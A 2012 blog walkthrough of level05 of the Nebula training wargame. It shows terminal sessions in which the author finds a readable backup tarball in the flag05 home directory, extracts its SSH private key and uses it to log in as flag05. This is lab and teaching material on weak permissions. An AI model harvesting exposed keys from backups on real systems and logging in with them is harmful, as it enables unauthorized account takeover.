Wednesday, August 8, 2012

nebula level05

The level details (at http://exploit-exercises.com/nebula/level05) say:
Check the flag05 home directory. You are looking for weak directory permissions
Next we check the aforementioned directory:
level05@nebula:~$ ls -la /home/flag05
total 36
drwxr-x---  5 flag05 level05 4096 2012-08-08 01:59 .
drwxr-xr-x 43 root   root    4096 2011-11-20 20:21 ..
drwxr-xr-x  2 flag05 flag05  4096 2011-11-20 20:13 .backup
-rw-------  1 flag05 flag05    20 2012-08-08 01:59 .bash_history
-rw-r--r--  1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
-rw-r--r--  1 flag05 flag05  3353 2011-05-18 02:54 .bashrc
drwx------  2 flag05 flag05  4096 2012-08-08 01:59 .cache
-rw-r--r--  1 flag05 flag05   675 2011-05-18 02:54 .profile
drwx------  2 flag05 flag05  4096 2011-11-20 20:13 .ssh
We notice the .ssh directory, which indicates that flag05 uses ssh, and the .backup directory, which we can examine:
level05@nebula:~$ ls -la /home/flag05/.backup
total 12
drwxr-xr-x 2 flag05 flag05  4096 2011-11-20 20:13 .
drwxr-x--- 5 flag05 level05 4096 2012-08-08 01:59 ..
-rw-rw-r-- 1 flag05 flag05  1826 2011-11-20 20:13 backup-19072011.tgz
Let's copy that backup tarball over and check it out.
level05@nebula:~$ cp /home/flag05/.backup/backup-19072011.tgz .
level05@nebula:~$ tar xvf backup-19072011.tgz
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
Whoa... It just dropped it's ssh private key (.ssh/id_rsa) in our home directory. And the presence of .ssh/id_rsa.pub indicates that it is (or used to be) in flag05's home directory as well. If it still is and corresponds to the same private key, we might be able to log in through ssh without a password. This is known as password-less login, and it's useful in some cases. The security is compromised if your id_rsa get's stolen and it doesn't require a passphrase though. Let's try to ssh as flag05, hopefully it won't require a passphrase:
level05@nebula:~$ ssh flag05@nebula

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/

    exploit-exercises.com/nebula


For level descriptions, please see the above URL.

To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.

Currently there are 20 levels (00 - 19).


Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)

 * Documentation:  https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Wed Aug  8 01:59:32 2012 from localhost
flag05@nebula:~$
We're in! Time for another flag...
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account
Nice and easy (given the right knowledge :)

~ Dmitry

No comments:

Post a Comment